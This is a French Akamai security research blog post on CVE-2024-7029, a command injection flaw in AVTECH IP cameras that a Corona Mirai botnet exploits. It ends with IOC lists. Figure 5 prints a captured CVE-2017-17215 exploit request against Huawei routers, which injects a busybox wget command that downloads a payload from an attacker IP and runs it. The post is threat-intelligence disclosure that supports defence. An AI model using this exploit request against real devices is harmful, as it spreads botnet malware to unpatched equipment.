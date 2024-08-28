X
Passer au contenu principal
Akamai
Se connecter
Se connecter Close
Cloud Manager
Gérez vos services de cloud computing
Se connecter Close
Control Center
Gérez vos services de sécurité et de diffusion

Méfiez-vous de ce qui ne peut être corrigé : Le botnet Corona Mirai se propage via Zero Day

Akamai Wave Blue

écrit par

Kyle Lefton, Larry Cashdollar, et Aline Eliovich

August 28, 2024

Kyle Lefton

écrit par

Kyle Lefton

Kyle Lefton is a security researcher on Akamai's Security Intelligence Response Team. Formerly an intelligence analyst for the Department of Defense, Kyle has experience in cyber defense, threat research, and counter-intelligence, spanning several years. He takes pride in investigating emerging threats, vulnerability research, and threat group mapping. In his free time, he enjoys spending time with friends and family, strategy games, and hiking in the great outdoors.

Larry Cashdollar

écrit par

Larry Cashdollar

Larry Cashdollar has been working in the security field as a vulnerability researcher for more than 20 years and is currently a Principal Security Researcher on the Security Intelligence Response Team at Akamai. He studied computer science at the University of Southern Maine. Larry has documented more than 300 CVEs and has presented his research at BotConf, BSidesBoston, OWASP Rhode Island, and DEF CON. He enjoys the outdoors and rebuilding small engines in his spare time.

Aline Eliovich

écrit par

Aline Eliovich

Aline Eliovich, with six years of experience in the security field, currently works as a Researcher on Akamai's Security Intelligence Response Team. She studied computer science at the Holon Technology Institute. Aline enjoys using different Open Source Intelligence (OSINT) methods for her research.

L'exploitation de cette vulnérabilité permet à un attaquant d'exécuter du code à distance sur un système cible.
L'exploitation de cette vulnérabilité permet à un attaquant d'exécuter du code à distance sur un système cible.

Éditorial et commentaires supplémentaires de Tricia Howard
Édité par Maria Vlasak

Synthèse

  • L'équipe SIRT (Security Intelligence and Response Team) d'Akamai a repéré une campagne de botnet qui exploite plusieurs vulnérabilités précédemment exploitées, ainsi qu'une vulnérabilité de type « Zero Day » découverte par l'équipe SIRT.

  • CVE-2024-7029 (découverte par Aline Eliovich) est une vulnérabilité d'injection de commande trouvée dans la fonction de luminosité des caméras de télévision en circuit fermé (CCTV) AVTECH qui permet l'exécution de code à distance (RCE).

  • Une fois la vulnérabilité injectée, le botnet diffuse une variante de Mirai dont les noms de chaînes font référence au virus COVID-19, observé depuis au moins 2020.  

  • Nous avons inclus une liste d'indicateurs de compromission (IOC) dans cet article de blog pour aider à la défense contre cette menace.

Passez à la démonstration de faisabilité

Introduction

L'équipe SIRT d'Akamai surveille un certain nombre de flux de renseignements internes et externes et y participe afin d'assurer la sécurité de nos données privées en ligne et de celles de nos clients. Nous avons découvert plusieurs menaces actives grâce à notre réseau mondial de leurre, y compris celle dont nous parlons aujourd'hui : CVE-2024-7029, découverte par Aline Eliovich.

Cette vulnérabilité RCE zero-day a été découverte dans la fonction de luminosité des caméras IP AVTECH et permet une injection de commande pour diffuser une variante de Mirai sur un système cible. Elle peut être exécutée à distance avec des privilèges élevés (propriétaire du processus en cours d'exécution). En août 2024, la CISA a publié un avis sur les systèmes de contrôle industriels (ICS) pour cette vulnérabilité, citant l'absence de complexité des attaques, l'exploitation à distance et l'exploitation publique connue.

La campagne de botnet cible plusieurs vulnérabilités en dehors de CVE-2024-7029, y compris plusieurs vulnérabilités AVTECH, un Hadoop YARN RCE, CVE-2014-8361 et CVE-2017-17215. Cela s'inscrit dans la tendance inquiétante qu'ont les attaquants d'utiliser, à des fins malveillantes, des vulnérabilités plus anciennes et probablement de faible priorité qui n'ont pas été corrigées.

Rattrapage et correction

S'il y a un moment où il faut rattraper son retard en matière de correction, c'est bien maintenant, car bon nombre de ces vulnérabilités présentent un élément RCE. Pire encore, l'absence d'attribution formelle de CVE rend difficile le suivi du bogue, sans parler des correctifs.

Dans cet article de blog, nous décrirons l'attaque « zero-day » et son impact, et vous présenterons une liste complète des IOC pour faciliter la détection ou l'atténuation.

Qu'est-ce que CVE-2024-7029 ?

En bref, la CVE-2024-7029 est une vulnérabilité dans les caméras IP AVTECH dans lesquels l'argument « brightness » dans le paramètre « action= » permet l'injection de commandes. L'acteur malveillant que nous avons observé a profité de cette vulnérabilité pour diffuser une variante Mirai avec des noms de chaînes faisant référence au virus de la COVID-19.

Depuis combien de temps est-elle active ?

La première campagne active que nous avons observée a débuté le 18 mars 2024, mais l'analyse a montré une activité pour cette variante dès décembre 2023. La preuve de concept (PoC) pour la CVE-2024-7029 est accessible au public depuis au moins 2019, mais il a fallu attendre août 2024 pour qu'elle soit attribuée à une CVE.

Qui est concerné ?

Cette vulnérabilité dans les caméras IP AVTECH affecte jusqu'aux versions du micrologiciel AVM1203 FullImg-1023-1007-1011-1009. Bien que le modèle en question ne soit plus utilisé depuis plusieurs années, la CISA indique dans son avis que ces terminaux sont toujours utilisés dans le monde entier, y compris par les autorités de transport et d'autres entités responsables d'infrastructures critiques.

Comment ça marche ?

À l'origine, cette vulnérabilité a été découverte en examinant nos journaux de leurre. La figure 1 montre l'URL décodée pour plus de clarté.

Charge utile décodée Fig. 1 : Corps de charge utile décodée des tentatives d'exploitation

Cette vulnérabilité réside dans la fonction luminosité du fichier /cgi-bin/supervisor/Factory.cgi (Figure 2).

La vulnérabilité réside dans la fonction luminosité Fig. 2 : Démonstration de faisabilité (PoC) de l'exploitation

Que pourrait-il se passer ?

Dans les exemples d'exploitation que nous avons observés, voici en substance ce qui s'est passé : L'exploitation de cette vulnérabilité permet à un attaquant d'exécuter du code à distance sur un système cible.

La figure 3 présente un exemple d'acteur malveillant exploitant cette faille pour télécharger et exécuter un fichier JavaScript afin de récupérer et de charger la charge utile principale du logiciel malveillant. Comme beaucoup d'autres botnets, celui-ci diffuse également une variante du logiciel malveillant Mirai à ses cibles.

La figure 3 présente un exemple d'acteur malveillant exploitant cette faille pour télécharger et exécuter un fichier JavaScript afin de récupérer et de charger la charge utile principale du logiciel malveillant. Fig. 3 : Chaînes du téléchargeur JavaScript

Dans ce cas, le botnet est susceptible d'utiliser la variante Corona Mirai, qui a été mentionnée par d'autres fournisseurs dès 2020 en relation avec le virus de la COVID-19. 

Une fois exécuté, le logiciel malveillant se connecte à un grand nombre d'hôtes via Telnet sur les ports 23, 2323 et 37215. Il imprime également la chaîne « Corona » sur la console sur un hôte infecté (figure 4).

Il imprime également la chaîne « Corona » sur la console sur un hôte infecté (figure 4).
Il imprime également la chaîne « Corona » sur la console sur un hôte infecté (figure 4). Fig. 4 : Exécution d'un logiciel malveillant affichant la sortie vers la console

L'analyse statique des chaînes dans les exemples de logiciels malveillants montre le ciblage du chemin /ctrlt/DeviceUpgrade_1 dans une tentative d'exploitation des appareils Huawei affectés par la CVE-2017-17215. Les échantillons comportent deux adresses IP de commande et de contrôle codées en dur, dont l'une fait partie du code d'exploitation CVE-2017-17215 (Figure 5). 

  POST /ctrlt/DeviceUpgrade_1 HTTP/1.1
  Content-Length: 430
  Connection: keep-alive
  Accept: */*
  Authorization: Digest username=\"dslf-config\", realm=\"HuaweiHomeGateway\", nonce=\"88645cefb1f9ede0e336e3569d75ee30\", uri=\"/ctrlt/DeviceUpgrade_1\", response=\"3612f843a42db38f48f59d2a3597e19c\", algorithm=\"MD5\", qop=\"auth\", nc=00000001, cnonce=\"248d1a2560100669\"

  <?xml version=\"1.0\" ?><s:Envelope xmlns:s=\"http://schemas.xmlsoap.org/soap/envelope/\" s:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\"><s:Body><u:Upgrade xmlns:u=\"urn:schemas-upnp-org:service:WANPPPConnection:1\"><NewStatusURL>$(/bin/busybox wget -g 45.14.244[.]89 -l /tmp/mips -r /mips; /bin/busybox chmod 777 * /tmp/mips; /tmp/mips huawei.rep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>

Fig. 5 : Exploitation de code CVE-2017-17215 /ctrlt/DeviceUpgrade_1

Le botnet a également ciblé plusieurs autres vulnérabilités, notamment une RCE Hadoop YARN, CVE-2014-8361 et CVE-2017-17215. Nous avons observé ces vulnérabilités exploitées sur le terrain à plusieurs reprises, et elles continuent d'être couronnées de succès.

Conclusion

Une vulnérabilité qui ne fait pas l'objet d'une assignation CVE officielle peut tout de même représenter une menace pour votre organisation. Cette vulnérabilité peut même constituer une menace importante. Les acteurs malveillants qui ont recours à ces botnets utilisent des vulnérabilités nouvelles ou peu connues pour faire proliférer des logiciels malveillants. CVE-2024-7029 est un autre exemple d'utilisation de cette dernière méthode, qui devient une tendance d'attaque de plus en plus populaire observée par l'équipe SIRT.

Il existe de nombreuses vulnérabilités avec des exploitations publiques ou des PoC disponibles qui n'ont pas d'affectation CVE formelle et, dans certains cas, les terminaux ne sont pas corrigés. La gestion des priorités en matière de correctifs est difficile, en particulier lorsque les menaces n'ont pas de correctif disponible. S'il n'y a aucun moyen de remédier à une menace, la mise hors service du matériel et des logiciels est le moyen recommandé pour atténuer les risques de sécurité et réduire le risque d'amendes réglementaires.

Suivez-nous

L'équipe SIRT d'Akamai continuera à découvrir, surveiller et signaler les menaces telles que CVE-2024-7029 pour la sécurité de nos clients, de nos collègues et de l'ensemble de la communauté des spécialistes de la sécurité. Pour vous tenir informé des dernières découvertes, suivez-nous sur les réseaux sociaux ou consultez notre page d'étude sur la sécurité.

Indicateurs de compromission (IOC)

Adresses IPv4

93.123.39[.]72

93.123.39[.]87

93.123.39[.]111

147.78.103[.]177

185.216.70[.]37

94.156.8[.]185

93.123.39[.]173

74.50.81[.]158

94.156.71[.]74

93.123.85[.]213

185.216.70[.]142

45.66.231[.]148

185.216.70[.]79

Hashs SHA256

15a1d52c529d314bb2b5fa8b8bd6c6a496609a283dd0e78e595c929e720d1b5b (« r »)

c0ae1eb249705f61d45ca747c91c02a411557a28792f4064c1d647abb580bc10 (« x86 »)

b0f7ef937d77061515907c54967a44da3701e0d2af143164bbf44bb4fc6f26af  (« sh »)

e82192fbe00bc7205abe786155bbfc0548f5c6ee9819a581e965526674f3cc57  (« mips »)

9e9e481bb448438572c2695469c85f773ddcd952025e45bee33bbfce2531c656  (« r »)

f4bf61fc335db4f3e7d7d89b534bc1e6ead66a51938e119ea340fe95039935e3  (« mips »)

22553be649f76a060ebbdfd410e295b66803e9c49d23369a726be2c5a25733ab  (« sh »)

135264de24d499877e95673b9cca737e488042813f41fef7817728a704323fe2  (« r »)

6ad5984bc9af7af6962a080bbb1a35bb56e8671c4b9c1d44e88da5a3f6b9aa82  (« r »)

947f517d3b833cc046b2ea0540aad199b7777fb03057122fb0b618828abdc212  (« r »)

8ac82a770cffbbc8fba73554d7caa117ef6d37ffee468665b95bc406449f91b5 (« r »)

5e264cb009c4d84b6180e47b9ceda3af8897b17b88fccc9c2914706d66abd1d1  (« r »)

372eefdc4bf9f4a4382db2762fcf9a9db559c9d4fff2ee5f5cf5362418caaa92  (« r »)

3995a7e7eb8eeafb0b6da2c3813e61d11993a820d478c87809136de79d8f8280  (« sh »)

40d8f662c187b53fd6fdeb70db9eb262b707e557d3fa4e5e4eacaeaa03ac45f2  (« r »)

4826b0194fbd924aa57b9c4ab1e017f0f45f547189374b0ea761d415fa4285ff  (« x86 »)

25945c4fe38ed2008f027bd1484b89867b23528c738812d317ddf57f48666b91  (« r »)

cfcae524309a220a48327c50bf32bf5ed3aed5698855b5da9f1ae932fb2df90c  (« x86 »)

774947944ea370592a30478bb3f26081799f7d7df975a6735e620d3442e7803b  (« x86 »)

06b1f09a62204472581e6aec381f96014bb6cc3fc1a9cef38bbcfe88bd82e499  (« r »)

4f50d318688c80f08eb7fad6f8788cae459c3420b3b9eb566f936edd7a780ae1  (« sh »)

c15bbfb85bfd8305fad8cc0e0d06cbe825e1e6fc6d8dbe5a8d1ac4243bd77d0c  (« x86 »)

0a566c39ecbc4107f954cb3e5e240ccaf0018dfac9b5062b4db7971fb3d9f413 (« x86 »)

2d7351aa765bb2feed9536cc392b2013361c193e99841c5b56591d988bd4b582  (« x86 »)

5d58f0fa54784e9c90825cba9e2052f691cdcfe85b0796a6379982832563090d (« x86 »)
Consulter plus d'articles de recherche
Consulter plus d'articles de recherche
Akamai Wave Blue

écrit par

Kyle Lefton, Larry Cashdollar, et Aline Eliovich

August 28, 2024

Kyle Lefton

écrit par

Kyle Lefton

Kyle Lefton is a security researcher on Akamai's Security Intelligence Response Team. Formerly an intelligence analyst for the Department of Defense, Kyle has experience in cyber defense, threat research, and counter-intelligence, spanning several years. He takes pride in investigating emerging threats, vulnerability research, and threat group mapping. In his free time, he enjoys spending time with friends and family, strategy games, and hiking in the great outdoors.

Larry Cashdollar

écrit par

Larry Cashdollar

Larry Cashdollar has been working in the security field as a vulnerability researcher for more than 20 years and is currently a Principal Security Researcher on the Security Intelligence Response Team at Akamai. He studied computer science at the University of Southern Maine. Larry has documented more than 300 CVEs and has presented his research at BotConf, BSidesBoston, OWASP Rhode Island, and DEF CON. He enjoys the outdoors and rebuilding small engines in his spare time.

Aline Eliovich

écrit par

Aline Eliovich

Aline Eliovich, with six years of experience in the security field, currently works as a Researcher on Akamai's Security Intelligence Response Team. She studied computer science at the Holon Technology Institute. Aline enjoys using different Open Source Intelligence (OSINT) methods for her research.

Articles de blog associés

Ces observations suggèrent l'existence d'un écosystème actif, capable de soutenir simultanément plusieurs stratégies de monétisation et d'attaque.
Ces observations suggèrent l'existence d'un écosystème actif, capable de soutenir simultanément plusieurs stratégies de monétisation et d'attaque.
Recherche

Quand les extensions pour la productivité se transforment en outils d'attaque

September 30, 2026
Nos recherches ont mis au jour une campagne impliquant 32 extensions de navigateur malveillantes, qui utilisent des configurations distantes pour espionner plus de 9 800 utilisateurs et détourner leur activité de navigation.
par Natalie Zagarov
En savoir plus
Le partage d'informations essentielles sur les menaces permet à l'ensemble de la communauté de la sécurité de garder une longueur d'avance sur les menaces émergentes.
Le partage d'informations essentielles sur les menaces permet à l'ensemble de la communauté de la sécurité de garder une longueur d'avance sur les menaces émergentes.
Recherche

Akamai rejoint la coalition Athena pour protéger les utilisateurs contre de nouvelles vulnérabilités

September 28, 2026
Akamai rejoint la coalition Athena de Chainguard et confirme que les clients d'Akamai App & API Protector sont automatiquement protégés contre les vulnérabilités récemment divulguées.
par Akamai Security Intelligence Group
En savoir plus
Les protections contre l'injection de commandes du moteur ASE bloquent déjà nativement les principaux vecteurs d'exploitation reposant sur les en-têtes et paramètres GraphQL.
Les protections contre l'injection de commandes du moteur ASE bloquent déjà nativement les principaux vecteurs d'exploitation reposant sur les en-têtes et paramètres GraphQL.
Recherche sur la sécurité

CVE-2026-75650 : StyleSmuggler – Vulnérabilité critique d'exécution de code à distance dans Adobe Commerce et Magento

September 14, 2026
Découvrez CVE-2026-75650 (StyleSmuggler), une vulnérabilité d'exécution de code à distance (RCE) qui affecte Adobe Commerce et Magento. Les protections contre l'injection de commandes de la solution Akamai Adaptive Security Engine bloquent les principaux vecteurs d'attaque.
par Akamai Security Intelligence Group
En savoir plus